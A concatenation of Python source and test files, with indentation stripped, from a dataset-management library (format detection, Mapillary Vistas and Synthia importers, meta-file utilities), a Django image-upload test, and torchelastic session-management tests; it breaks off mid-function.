def alternative(self) -> Iterator[None]:
"""
Returns a context manager that can be used in combination with
`require_any` to define alternative requirements. See the
documentation for `require_any` for more details.
        Must only be used directly within a `with context.require_any()` block.
"""
assert self._one_or_more_context, \
"An 'alternative' block must be directly within " \
"a 'require_any' block"
saved_one_or_more_context = self._one_or_more_context
self._one_or_more_context = None
try:
yield
except FormatRequirementsUnmet as e:
saved_one_or_more_context.failed_alternatives.extend(
e.failed_alternatives)
else:
saved_one_or_more_context.had_successful_alternatives = True
finally:
self._one_or_more_context = saved_one_or_more_context
FormatDetector = Callable[
[FormatDetectionContext],
Optional[FormatDetectionConfidence],
]
"""
Denotes a callback that implements detection for a specific dataset format.
The callback receives an instance of `FormatDetectionContext` and must call
methods on that instance to place requirements that the dataset must meet
in order for it to be considered as belonging to the format.
Must return the level of confidence in the dataset belonging to the format
(or `None`, which is equivalent to the `MEDIUM` level)
or terminate via a `FormatRequirementsUnmet` exception raised by one of
the `FormatDetectionContext` methods.
"""
def apply_format_detector(
dataset_root_path: str, detector: FormatDetector,
) -> FormatDetectionConfidence:
"""
Checks whether the dataset located at `dataset_root_path` belongs to the
format detected by `detector`. If it does, returns the confidence level
of the detection. Otherwise, raises a `FormatRequirementsUnmet` exception.
"""
context = FormatDetectionContext(dataset_root_path)
if not osp.isdir(dataset_root_path):
context.fail(f"root path {dataset_root_path} must refer to a directory")
return detector(context) or FormatDetectionConfidence.MEDIUM
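# A minimal sketch of a detector written against this API (the file pattern
# and format are hypothetical; only calls defined above are used):
#
# def detect_my_format(context: FormatDetectionContext):
#     context.require_file('annotations/*.json')
#     return FormatDetectionConfidence.MEDIUM
#
# confidence = apply_format_detector('/path/to/dataset', detect_my_format)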
```
#### File: plugins/mapillary_vistas_format/importer.py
```python
import glob
import logging as log
import os.path as osp
from datumaro.components.extractor import DEFAULT_SUBSET_NAME, Importer
from .extractor import (
MapillaryVistasInstancesExtractor, MapillaryVistasPanopticExtractor,
)
from .format import MapillaryVistasPath, MapillaryVistasTask
class MapillaryVistasImporter(Importer):
_TASKS = {
MapillaryVistasTask.instances: MapillaryVistasInstancesExtractor,
MapillaryVistasTask.panoptic: MapillaryVistasPanopticExtractor,
}
@classmethod
def build_cmdline_parser(cls, **kwargs):
parser = super().build_cmdline_parser(**kwargs)
parser.add_argument('--use-original-config', action='store_true',
help="Use original config*.json file for your version of dataset")
parser.add_argument('--keep-original-category-ids', action='store_true',
help="Add dummy label categories so that category indices "
"correspond to the category IDs in the original annotation "
"file")
return parser
def __call__(self, path, **extra_params):
subsets = self.find_sources(path)
if len(subsets) == 0:
raise Exception("Failed to find Mapillary Vistas dataset at '%s'" % path)
tasks = list(set(task for subset in subsets.values() for task in subset))
selected_task = tasks[0]
if 1 < len(tasks):
log.warning(
"Found potentially conflicting source types: %s"
"Only one one type will be used: %s" \
% (','.join(task.name for task in tasks), selected_task.name)
)
if selected_task == MapillaryVistasTask.instances:
has_config = any([osp.isfile(osp.join(path, config))
for config in MapillaryVistasPath.CONFIG_FILES.values()])
if not has_config and not extra_params.get('use_original_config'):
raise Exception("Failed to find config*.json at '%s'. "
"See extra args for using original config" % path)
sources = [
{
'url': url,
'format': self._TASKS[task].NAME,
'options': dict(extra_params)
}
for _, subset_info in subsets.items()
for task, url in subset_info.items()
if task == selected_task
]
return sources
@classmethod
def find_sources(cls, path):
subsets = {}
suffixes = [
osp.join(ann_dir, subdir)
for ann_dir, subdirs in MapillaryVistasPath.ANNOTATION_DIRS.items()
for subdir in subdirs
]
for suffix in suffixes:
task = MapillaryVistasPath.CLASS_BY_DIR[osp.basename(suffix)]
if task not in cls._TASKS:
continue
if osp.isdir(osp.join(path, suffix)):
return {DEFAULT_SUBSET_NAME: {task: path}}
for ann_path in glob.glob(osp.join(path, '*', suffix)):
subset = osp.dirname(osp.dirname(osp.relpath(ann_path, path)))
subsets.setdefault(subset, {})[task] = osp.join(path, subset)
return subsets
class MapillaryVistasInstancesImporter(MapillaryVistasImporter):
_TASK = MapillaryVistasTask.instances
_TASKS = { _TASK: MapillaryVistasImporter._TASKS[_TASK] }
class MapillaryVistasPanopticImporter(MapillaryVistasImporter):
_TASK = MapillaryVistasTask.panoptic
_TASKS = { _TASK: MapillaryVistasImporter._TASKS[_TASK] }
```
#### File: datumaro/plugins/synthia_format.py
```python
from collections import OrderedDict
import os.path as osp
import numpy as np
from datumaro.components.annotation import (
AnnotationType, LabelCategories, Mask, MaskCategories,
)
from datumaro.components.extractor import DatasetItem, Importer, SourceExtractor
from datumaro.components.format_detection import FormatDetectionContext
from datumaro.util.image import find_images, load_image
from datumaro.util.mask_tools import generate_colormap, lazy_mask
from datumaro.util.meta_file_util import has_meta_file, parse_meta_file
class SynthiaPath:
IMAGES_DIR = 'RGB'
LABELS_SEGM_DIR = 'GT/LABELS'
SEMANTIC_SEGM_DIR = 'GT/COLOR'
LABELMAP_FILE = 'label_colors.txt'
SYNTHIA_LABEL_MAP = OrderedDict([
('Void', (0, 0, 0)),
('Sky', (128, 128, 128)),
('Building', (128, 0, 0)),
('Road', (128, 64, 128)),
('Sidewalk', (0, 0, 192)),
('Fence', (64, 64, 128)),
('Vegetation', (128, 128, 0)),
('Pole', (192, 192, 128)),
('Car', (64, 0, 128)),
('TrafficSign', (192, 128, 128)),
('Pedestrian', (64, 64, 0)),
('Bicycle', (0, 128, 192)),
('Lanemarking', (0, 172, 0)),
('Reserved_1', (0, 0, 0)),
('Reserved_2', (0, 0, 0)),
('TrafficLight', (0, 128, 128)),
])
def make_categories(label_map=None):
if label_map is None:
label_map = SYNTHIA_LABEL_MAP
categories = {}
label_categories = LabelCategories()
for label in label_map:
label_categories.add(label)
categories[AnnotationType.label] = label_categories
has_colors = any(v is not None for v in label_map.values())
if not has_colors: # generate new colors
colormap = generate_colormap(len(label_map))
else: # only copy defined colors
colormap = { label_id: (desc[0], desc[1], desc[2])
for label_id, desc in enumerate(label_map.values()) }
mask_categories = MaskCategories(colormap)
mask_categories.inverse_colormap # pylint: disable=pointless-statement
categories[AnnotationType.mask] = mask_categories
return categories
def parse_label_map(path):
label_map = OrderedDict()
with open(path, 'r', encoding='utf-8') as f:
for line in f:
# skip empty and commented lines
line = line.strip()
if not line or line[0] == '#':
continue
# color, name
label_desc = line.split()
if 2 < len(label_desc):
name = label_desc[3]
color = tuple([int(c) for c in label_desc[:3]])
else:
name = label_desc[0]
color = None
if name in label_map:
raise ValueError("Label '%s' is already defined" % name)
label_map[name] = color
return label_map
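# For reference, parse_label_map() reads label_colors.txt rows of the form
# "R G B name" (or just a bare label name with no color), e.g.:
# 128 0 0 Building
# 128 64 128 Road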
class SynthiaExtractor(SourceExtractor):
def __init__(self, path):
if not osp.isdir(path):
raise FileNotFoundError("Can't read dataset directory '%s'" % path)
super().__init__()
self._categories = self._load_categories(path)
self._items = list(self._load_items(path).values())
def _load_categories(self, path):
if has_meta_file(path):
return make_categories(parse_meta_file(path))
label_map_path = osp.join(path, SynthiaPath.LABELMAP_FILE)
if osp.isfile(label_map_path):
label_map = parse_label_map(label_map_path)
else:
label_map = SYNTHIA_LABEL_MAP
return make_categories(label_map)
def _load_items(self, root_dir):
image_dir = osp.join(root_dir, SynthiaPath.IMAGES_DIR)
if osp.isdir(image_dir):
images = {
osp.splitext(osp.relpath(p, image_dir))[0].replace('\\', '/'): p
for p in find_images(image_dir, recursive=True)
}
else:
images = {}
items = {}
inst_dir = osp.join(root_dir, SynthiaPath.LABELS_SEGM_DIR)
if osp.isdir(inst_dir):
gt_images = find_images(inst_dir, recursive=True)
for gt_img in gt_images:
item_id = osp.splitext(osp.relpath(gt_img, inst_dir))[0].replace('\\', '/')
anno = []
labels_mask = load_image(gt_img, dtype=np.uint16)
dynamic_objects = np.unique(labels_mask[:,:,1])
labels_mask = labels_mask[:,:,2]
segm_ids = np.unique(labels_mask)
for segm_id in segm_ids:
attr = { 'dynamic_object': False }
if segm_id != 0 and segm_id in dynamic_objects:
attr['dynamic_object'] = True
anno.append(Mask(
image=self._lazy_extract_mask(labels_mask, segm_id),
label=segm_id, attributes=attr))
items[item_id] = DatasetItem(id=item_id, image=images[item_id],
annotations=anno)
elif osp.isdir(osp.join(root_dir, SynthiaPath.SEMANTIC_SEGM_DIR)):
gt_dir = osp.join(root_dir, SynthiaPath.SEMANTIC_SEGM_DIR)
gt_images = find_images(gt_dir, recursive=True)
for gt_img in gt_images:
item_id = osp.splitext(osp.relpath(gt_img, gt_dir))[0].replace('\\', '/')
anno = []
inverse_cls_colormap = \
self._categories[AnnotationType.mask].inverse_colormap
color_mask = lazy_mask(gt_img, inverse_cls_colormap)
color_mask = color_mask()
classes = np.unique(color_mask)
for label_id in classes:
anno.append(Mask(image=self._lazy_extract_mask(color_mask, label_id),
label=label_id))
items[item_id] = DatasetItem(id=item_id, image=images[item_id],
annotations=anno)
return items
@staticmethod
def _lazy_extract_mask(mask, c):
return lambda: mask == c
class SynthiaImporter(Importer):
@classmethod
def detect(cls, context: FormatDetectionContext) -> None:
with context.require_any():
for prefix in (
SynthiaPath.IMAGES_DIR, SynthiaPath.LABELS_SEGM_DIR, SynthiaPath.SEMANTIC_SEGM_DIR
):
with context.alternative():
context.require_file(f'{prefix}/**/*.png')
@classmethod
def find_sources(cls, path):
return [{'url': path, 'format': 'synthia'}]
```
#### File: datumaro/util/meta_file_util.py
```python
from collections import OrderedDict
import json
import os.path as osp
from datumaro.components.annotation import AnnotationType
from datumaro.util import find
DATASET_META_FILE = 'dataset_meta.json'
def is_meta_file(path):
return osp.splitext(osp.basename(path))[1] == '.json'
def has_meta_file(path):
return osp.isfile(get_meta_file(path))
def get_meta_file(path):
return osp.join(path, DATASET_META_FILE)
def parse_meta_file(path):
meta_file = path
if osp.isdir(path):
meta_file = get_meta_file(path)
with open(meta_file) as f:
dataset_meta = json.load(f)
label_map = OrderedDict()
for label in dataset_meta.get('labels', []):
label_map[label] = None
colors = dataset_meta.get('segmentation_colors', [])
for i, label in dataset_meta.get('label_map', {}).items():
label_map[label] = None
if any(colors) and colors[int(i)] is not None:
label_map[label] = tuple(colors[int(i)])
return label_map
def save_meta_file(path, categories):
dataset_meta = {}
labels = [label.name for label in categories[AnnotationType.label]]
dataset_meta['labels'] = labels
if categories.get(AnnotationType.mask):
label_map = {}
segmentation_colors = []
for i, color in categories[AnnotationType.mask].colormap.items():
if color:
segmentation_colors.append([int(color[0]), int(color[1]), int(color[2])])
label_map[str(i)] = labels[i]
dataset_meta['label_map'] = label_map
dataset_meta['segmentation_colors'] = segmentation_colors
bg_label = find(categories[AnnotationType.mask].colormap.items(),
lambda x: x[1] == (0, 0, 0))
if bg_label is not None:
dataset_meta['background_label'] = str(bg_label[0])
meta_file = path
if osp.isdir(path):
meta_file = get_meta_file(path)
with open(meta_file, 'w') as f:
json.dump(dataset_meta, f)
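# For orientation, save_meta_file() writes a dataset_meta.json along these
# lines (labels/colors are illustrative; "label_map", "segmentation_colors"
# and "background_label" appear only when mask categories are present):
# {
#     "labels": ["background", "cat", "dog"],
#     "label_map": {"0": "background", "1": "cat", "2": "dog"},
#     "segmentation_colors": [[0, 0, 0], [128, 0, 0], [0, 128, 0]],
#     "background_label": "0"
# }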
```
#### File: tests/cli/test_filter.py
```python
from unittest import TestCase
import os.path as osp
from datumaro.components.annotation import Bbox, Label
from datumaro.components.dataset import Dataset
from datumaro.components.errors import ReadonlyDatasetError
from datumaro.components.extractor import DatasetItem
from datumaro.components.project import Project
from datumaro.util.scope import scope_add, scoped
from datumaro.util.test_utils import TestDir, compare_datasets
from datumaro.util.test_utils import run_datum as run
from ..requirements import Requirements, mark_requirement
class FilterTest(TestCase):
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
@scoped
def test_can_filter_dataset_inplace(self):
test_dir = scope_add(TestDir())
Dataset.from_iterable([
DatasetItem(1, annotations=[Label(0)]),
DatasetItem(2, annotations=[Label(1)]),
], categories=['a', 'b']).export(test_dir, 'coco')
run(self, 'filter', '-e', '/item[id = "1"]', '--overwrite',
test_dir + ':coco')
expected_dataset = Dataset.from_iterable([
DatasetItem(1, annotations=[Label(0, id=1, group=1)]),
], categories=['a', 'b'])
compare_datasets(self, expected_dataset,
Dataset.import_from(test_dir, 'coco'), ignored_attrs='*')
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_filter_fails_on_inplace_update_without_overwrite(self):
with TestDir() as test_dir:
Dataset.from_iterable([
DatasetItem(id=1, annotations=[ Bbox(1, 2, 3, 4, label=1) ]),
], categories=['a', 'b']).export(test_dir, 'coco')
run(self, 'filter', '-e', '/item', test_dir + ':coco',
expected_code=1)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_filter_fails_on_inplace_update_of_stage(self):
with TestDir() as test_dir:
dataset_url = osp.join(test_dir, 'dataset')
dataset = Dataset.from_iterable([
DatasetItem(id=1, annotations=[ Bbox(1, 2, 3, 4, label=1) ]),
], categories=['a', 'b'])
dataset.export(dataset_url, 'coco', save_images=True)
project_dir = osp.join(test_dir, 'proj')
with Project.init(project_dir) as project:
project.import_source('source-1', dataset_url, 'coco',
no_cache=True)
project.commit('first commit')
with self.subTest('without overwrite'):
run(self, 'filter', '-p', project_dir,
'-e', '/item', 'HEAD:source-1',
expected_code=1)
with self.subTest('with overwrite'):
with self.assertRaises(ReadonlyDatasetError):
run(self, 'filter', '-p', project_dir, '--overwrite',
'-e', '/item', 'HEAD:source-1')
```
#### File: datumaro/tests/test_image_dir_format.py
```python
from unittest import TestCase
import os
import os.path as osp
import numpy as np
from datumaro.components.extractor import DatasetItem
from datumaro.components.media import Image
from datumaro.components.project import Dataset
from datumaro.plugins.image_dir_format import ImageDirConverter
from datumaro.util.image import save_image
from datumaro.util.test_utils import (
TestDir, check_save_and_load, compare_datasets,
)
from .requirements import Requirements, mark_requirement
class ImageDirFormatTest(TestCase):
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_load(self):
dataset = Dataset.from_iterable([
DatasetItem(id=1, image=np.ones((10, 6, 3))),
DatasetItem(id=2, image=np.ones((5, 4, 3))),
])
with TestDir() as test_dir:
check_save_and_load(self, dataset, ImageDirConverter.convert,
test_dir, importer='image_dir', require_images=True)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_relative_paths(self):
dataset = Dataset.from_iterable([
DatasetItem(id='1', image=np.ones((4, 2, 3))),
DatasetItem(id='subdir1/1', image=np.ones((2, 6, 3))),
DatasetItem(id='subdir2/1', image=np.ones((5, 4, 3))),
])
with TestDir() as test_dir:
check_save_and_load(self, dataset, ImageDirConverter.convert,
test_dir, importer='image_dir')
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_save_dataset_with_cyrillic_and_spaces_in_filename(self):
dataset = Dataset.from_iterable([
DatasetItem(id='кириллица с пробелом', image=np.ones((4, 2, 3))),
])
with TestDir() as test_dir:
check_save_and_load(self, dataset, ImageDirConverter.convert,
test_dir, importer='image_dir')
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_save_and_load_image_with_arbitrary_extension(self):
dataset = Dataset.from_iterable([
DatasetItem(id='q/1', image=Image(path='q/1.JPEG',
data=np.zeros((4, 3, 3)))),
DatasetItem(id='a/b/c/2', image=Image(path='a/b/c/2.bmp',
data=np.zeros((3, 4, 3)))),
])
with TestDir() as test_dir:
check_save_and_load(self, dataset, ImageDirConverter.convert,
test_dir, importer='image_dir', require_images=True)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_save_and_load_image_with_custom_extension(self):
expected = Dataset.from_iterable([
DatasetItem(id='a/3', image=Image(path='a/3.qq',
data=np.zeros((3, 4, 3)))),
])
with TestDir() as test_dir:
image_path = osp.join(test_dir, 'a', '3.jpg')
save_image(image_path, expected.get('a/3').image.data,
create_dir=True)
os.rename(image_path, osp.join(test_dir, 'a', '3.qq'))
actual = Dataset.import_from(test_dir, 'image_dir', exts='qq')
compare_datasets(self, expected, actual, require_images=True)
```
#### File: datumaro/tests/test_mars_format.py
```python
from unittest.case import TestCase
import os.path as osp
import numpy as np
from datumaro.components.annotation import Label
from datumaro.components.dataset import Dataset, DatasetItem
from datumaro.components.environment import Environment
from datumaro.plugins.mars_format import MarsImporter
from datumaro.util.test_utils import compare_datasets
from tests.requirements import Requirements, mark_requirement
ASSETS_DIR = osp.join(osp.dirname(__file__), 'assets')
DUMMY_MARS_DATASET = osp.join(ASSETS_DIR, 'mars_dataset')
class MarsImporterTest(TestCase):
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_import(self):
expected_dataset = Dataset.from_iterable([
DatasetItem(id='0001C1T0001F001', image=np.ones((10, 10, 3)),
subset='train', annotations=[Label(label=2)],
attributes={'person_id': '0001', 'camera_id': 1, 'track_id': 1,
'frame_id': 1}
),
DatasetItem(id='0000C6T0101F001', image=np.ones((10, 10, 3)),
subset='train', annotations=[Label(label=1)],
attributes={'person_id': '0000', 'camera_id': 6, 'track_id': 101,
'frame_id': 1}
),
DatasetItem(id='00-1C2T0081F201', image=np.ones((10, 10, 3)),
subset='test', annotations=[Label(label=0)],
attributes={'person_id': '00-1', 'camera_id': 2, 'track_id': 81,
'frame_id': 201}
),
], categories=['00-1', '0000', '0001'])
imported_dataset = Dataset.import_from(DUMMY_MARS_DATASET, 'mars')
compare_datasets(self, expected_dataset, imported_dataset, require_images=True)
@mark_requirement(Requirements.DATUM_GENERAL_REQ)
def test_can_detect(self):
detected_formats = Environment().detect_dataset(DUMMY_MARS_DATASET)
self.assertEqual([MarsImporter.NAME], detected_formats)
```
|
{
"source": "jenhaoyang/Disfactory",
"score": 2
}
|
#### File: views/tests/test_image_c.py
```python
from datetime import datetime, timezone
from unittest.mock import patch
from pathlib import Path
from freezegun import freeze_time
from django.test import TestCase, Client
from django.conf import settings
from api.models import Image
HERE = Path(__file__).resolve().parent
FAKE_IMGUR_PATH = "https://i.imgur.com/RxArJUc.png"
class PostImageViewTestCase(TestCase):
@patch("api.views.image_c._upload_image", return_value=FAKE_IMGUR_PATH)
def test_image_with_exif_db_correct(self, patch_upload):
cli = Client()
test_time = datetime(2019, 11, 11, 11, 11, 11, tzinfo=timezone.utc)
with freeze_time(test_time):
with open(HERE / "20180311_132133.jpg", "rb") as f_img:
resp = cli.post("/api/images", {'image': f_img}, format='multipart')
self.assertEqual(resp.status_code, 200)
resp_data = resp.json()
self.assertIn('token', resp_data)
img_id = resp_data['token']
img = Image.objects.get(pk=img_id)
self.assertEqual(img.image_path, FAKE_IMGUR_PATH)
self.assertEqual(img.created_at, test_time)
self.assertEqual(img.orig_time, datetime(2018, 3, 11, 13, 21, 33, tzinfo=timezone.utc))
@patch("api.views.image_c._get_image_original_date", return_value=None)
@patch("api.views.image_c._upload_image", return_value=FAKE_IMGUR_PATH)
def test_image_without_exif_db_correct(self, patch_upload, _):
cli = Client()
test_time = datetime(2019, 11, 11, 11, 11, 11, tzinfo=timezone.utc)
with freeze_time(test_time):
with open(HERE / "20180311_132133.jpg", "rb") as f_img:
resp = cli.post("/api/images", {'image': f_img}, format='multipart')
resp_data = resp.json()
self.assertEqual(resp.status_code, 200)
self.assertIn('token', resp_data)
img_id = resp_data['token']
img = Image.objects.get(pk=img_id)
self.assertEqual(img.image_path, FAKE_IMGUR_PATH)
self.assertEqual(img.created_at, test_time)
self.assertIsNone(img.orig_time)
@patch("api.views.image_c._upload_image", return_value=FAKE_IMGUR_PATH)
def test_return_400_if_not_image(self, patch_upload):
cli = Client()
with open(HERE / "test_image_c.py", "rb") as f_img:
resp = cli.post("/api/images", {'image': f_img}, format='multipart')
self.assertEqual(resp.status_code, 400)
```
|
{
"source": "jenhaoyang/elastic",
"score": 2
}
|
#### File: driver/test/standalone_session_test.py
```python
import datetime
import json
import os
import shutil
import tempfile
import unittest
from typing import Optional, Dict
from unittest.mock import MagicMock, patch
from torchelastic.tsm.driver.api import (
Application,
AppStatus,
AppState,
Container,
DescribeAppResponse,
Resource,
AppDryRunInfo,
Role,
AppHandle,
RunConfig,
SessionMismatchException,
UnknownAppException,
parse_app_handle,
)
from torchelastic.tsm.driver.local_scheduler import LocalScheduler
from torchelastic.tsm.driver.standalone_session import StandaloneSession, LoggingSession
from torchelastic.tsm.events import SourceType, TsmEvent
from .test_util import write_shell_script
class resource:
SMALL = Resource(cpu=1, gpu=0, memMB=1024)
MEDIUM = Resource(cpu=4, gpu=0, memMB=(4 * 1024))
LARGE = Resource(cpu=16, gpu=0, memMB=(16 * 1024))
SESSION_NAME = "test_session"
class DummySession(LoggingSession):
def _dryrun(self, app, scheduler, cfg):
return None
def scheduler_backends(self):
return []
def _schedule(self, dryrun_info: AppDryRunInfo) -> AppHandle:
return "default://test_session/test_app"
def _status(self, app_handle: AppHandle) -> Optional[AppStatus]:
return None
def _wait(self, app_handle: AppHandle) -> Optional[AppStatus]:
return None
def _list(self) -> Dict[AppHandle, Application]:
return {}
def _stop(self, app_handle: AppHandle) -> None:
pass
def _describe(self, app_handle: AppHandle) -> Optional[Application]:
return None
def _log_lines(
self,
app_handle: AppHandle,
role_name: str,
k: int = 0,
regex: Optional[str] = None,
since: Optional[datetime.datetime] = None,
until: Optional[datetime.datetime] = None,
should_tail: bool = False,
):
return iter(["test_log"])
@patch("torchelastic.tsm.driver.standalone_session.record")
class LoggingSessionTest(unittest.TestCase):
def assert_tsm_event(self, expected: TsmEvent, actual: TsmEvent):
self.assertEqual(expected.session, actual.session)
self.assertEqual(expected.app_id, actual.app_id)
self.assertEqual(expected.api, actual.api)
self.assertEqual(expected.source, actual.source)
def test_status_success(self, record_tsm_mock):
session = DummySession("test_session")
session.status("default://test_session/test_app")
actual_tsm_event = record_tsm_mock.call_args[0][0] # first arg
self.assert_tsm_event(
session._generate_tsm_event(
"status", "default", "test_app", source=SourceType.EXTERNAL
),
actual_tsm_event,
)
def test_status_fail(self, record_tsm_mock):
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_status") as status_mock:
status_mock.side_effect = RuntimeError("test error")
session.status("default://test_session/test_app")
record_tsm_mock.assert_called()
def test_wait_fail(self, record_tsm_mock):
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_wait") as status_mock:
status_mock.side_effect = RuntimeError("test error")
session.wait("default://test_session/test_app")
record_tsm_mock.assert_called()
def test_describe_fail(self, record_tsm_mock):
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_describe") as status_mock:
status_mock.side_effect = RuntimeError("test error")
session.describe("default://test_session/test_app")
record_tsm_mock.assert_called()
def test_list_fail(self, record_tsm_mock):
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_list") as status_mock:
status_mock.side_effect = RuntimeError("test error")
session.list()
record_tsm_mock.assert_called()
def test_schedule_fail(self, record_tsm_mock):
app_info = AppDryRunInfo("test", lambda x: "test")
app_info._scheduler = "default"
cfg = RunConfig({"image_fetcher": "dir"})
app_info._cfg = cfg
session = DummySession("test_session")
with self.assertRaises(RuntimeError):
with patch.object(session, "_schedule") as schedule_mock:
schedule_mock.side_effect = RuntimeError("test error")
session.schedule(app_info)
record_tsm_mock.assert_called()
def test_schedule_success(self, record_tsm_mock):
app_info = AppDryRunInfo("test", lambda x: "test")
app_info._scheduler = "default"
cfg = RunConfig({"image_fetcher": "dir"})
app_info._cfg = cfg
session = DummySession("test_session")
app_handle = session.schedule(app_info)
actual_tsm_event = record_tsm_mock.call_args[0][0] # first arg
_, _, app_id = parse_app_handle(app_handle)
self.assert_tsm_event(
session._generate_tsm_event(
"schedule",
"default",
app_id,
runcfg=json.dumps(cfg.cfgs),
source=SourceType.EXTERNAL,
),
actual_tsm_event,
)
@patch("torchelastic.tsm.driver.standalone_session.record")
class StandaloneSessionTest(unittest.TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp("StandaloneSessionTest")
write_shell_script(self.test_dir, "touch.sh", ["touch $1"])
write_shell_script(self.test_dir, "fail.sh", ["exit 1"])
write_shell_script(self.test_dir, "sleep.sh", ["sleep $1"])
self.scheduler = LocalScheduler(SESSION_NAME)
self.cfg = RunConfig({"image_fetcher": "dir"})
# resource ignored for local scheduler; adding as an example
self.test_container = Container(image=self.test_dir).require(resource.SMALL)
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_run(self, _):
test_file = os.path.join(self.test_dir, "test_file")
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
self.assertEqual(1, len(session.scheduler_backends()))
role = Role(name="touch").runs("touch.sh", test_file).on(self.test_container)
app = Application("name").of(role)
app_handle = session.run(app, cfg=self.cfg)
self.assertEqual(AppState.SUCCEEDED, session.wait(app_handle).state)
def test_dryrun(self, _):
scheduler_mock = MagicMock()
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": scheduler_mock}, wait_interval=1
)
role = Role(name="touch").runs("echo", "hello world").on(self.test_container)
app = Application("name").of(role)
session.dryrun(app, "default", cfg=self.cfg)
scheduler_mock.submit_dryrun.assert_called_once_with(app, self.cfg)
scheduler_mock._validate.assert_called_once()
def test_describe(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}
)
role = Role(name="sleep").runs("sleep.sh", "60").on(self.test_container)
app = Application("sleeper").of(role)
app_handle = session.run(app, cfg=self.cfg)
self.assertEqual(app, session.describe(app_handle))
# unknown app should return None
self.assertIsNone(session.describe("default://session1/unknown_app"))
def test_list(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
role = Role(name="touch").runs("sleep.sh", "1").on(self.test_container)
app = Application("sleeper").of(role)
num_apps = 4
for _ in range(num_apps):
            # since this test validates the list() API, we do not wait for
            # the apps to finish; run them in managed mode so that the local
            # scheduler reaps the apps on exit
session.run(app)
apps = session.list()
self.assertEqual(num_apps, len(apps))
def test_evict_non_existent_app(self, _):
# tests that apps previously run with this session that are finished and eventually
# removed by the scheduler also get removed from the session after a status() API has been
# called on the app
scheduler = LocalScheduler(session_name=SESSION_NAME, cache_size=1)
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": scheduler}, wait_interval=1
)
test_file = os.path.join(self.test_dir, "test_file")
role = Role(name="touch").runs("touch.sh", test_file).on(self.test_container)
app = Application("touch_test_file").of(role)
# local scheduler was setup with a cache size of 1
# run the same app twice (the first will be removed from the scheduler's cache)
# then validate that the first one will drop from the session's app cache as well
app_id1 = session.run(app, cfg=self.cfg)
session.wait(app_id1)
app_id2 = session.run(app, cfg=self.cfg)
session.wait(app_id2)
apps = session.list()
self.assertEqual(1, len(apps))
self.assertFalse(app_id1 in apps)
self.assertTrue(app_id2 in apps)
def test_status(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
role = Role(name="sleep").runs("sleep.sh", "60").on(self.test_container)
app = Application("sleeper").of(role)
app_handle = session.run(app, cfg=self.cfg)
self.assertEqual(AppState.RUNNING, session.status(app_handle).state)
session.stop(app_handle)
self.assertEqual(AppState.CANCELLED, session.status(app_handle).state)
def test_status_unknown_app(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
self.assertIsNone(session.status("default://test_session/unknown_app_id"))
@patch("json.dumps")
def test_status_ui_url(self, json_dumps_mock, _):
app_id = "test_app"
json_dumps_mock.return_value = "{}"
mock_scheduler = MagicMock()
resp = DescribeAppResponse()
resp.ui_url = "https://foobar"
mock_scheduler.submit.return_value = app_id
mock_scheduler.describe.return_value = resp
session = StandaloneSession(
name="test_ui_url_session", schedulers={"default": mock_scheduler}
)
role = Role("ignored").runs("/bin/echo").on(self.test_container)
app_handle = session.run(Application(app_id).of(role))
status = session.status(app_handle)
        self.assertEqual(resp.ui_url, status.ui_url)
@patch("json.dumps")
def test_status_structured_msg(self, json_dumps_mock, _):
app_id = "test_app"
json_dumps_mock.return_value = "{}"
mock_scheduler = MagicMock()
resp = DescribeAppResponse()
resp.structured_error_msg = '{"message": "test error"}'
mock_scheduler.submit.return_value = app_id
mock_scheduler.describe.return_value = resp
session = StandaloneSession(
name="test_structured_msg", schedulers={"default": mock_scheduler}
)
role = Role("ignored").runs("/bin/echo").on(self.test_container)
app_handle = session.run(Application(app_id).of(role))
status = session.status(app_handle)
        self.assertEqual(resp.structured_error_msg, status.structured_error_msg)
def test_wait_unknown_app(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
self.assertIsNone(session.wait("default://test_session/unknown_app_id"))
self.assertIsNone(session.wait("default://another_session/some_app"))
def test_stop(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
self.assertIsNone(session.stop("default://test_session/unknown_app_id"))
with self.assertRaises(SessionMismatchException):
session.stop("default://another_session/some_app_id")
def test_log_lines_unknown_app(self, _):
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": self.scheduler}, wait_interval=1
)
with self.assertRaises(UnknownAppException):
session.log_lines("default://test_session/unknown", "trainer")
def test_log_lines(self, _):
app_id = "mock_app"
scheduler_mock = MagicMock()
scheduler_mock.describe.return_value = DescribeAppResponse(
app_id, AppState.RUNNING
)
scheduler_mock.log_iter.return_value = iter(["hello", "world"])
session = StandaloneSession(
name=SESSION_NAME, schedulers={"default": scheduler_mock}, wait_interval=1
)
role_name = "trainer"
replica_id = 2
regex = "QPS.*"
since = datetime.datetime.now()
until = datetime.datetime.now()
lines = list(
session.log_lines(
f"default://test_session/{app_id}",
role_name,
replica_id,
regex,
since,
until,
)
)
self.assertEqual(["hello", "world"], lines)
scheduler_mock.log_iter.assert_called_once_with(
app_id, role_name, replica_id, regex, since, until, False
)
def test_no_default_scheduler(self, _):
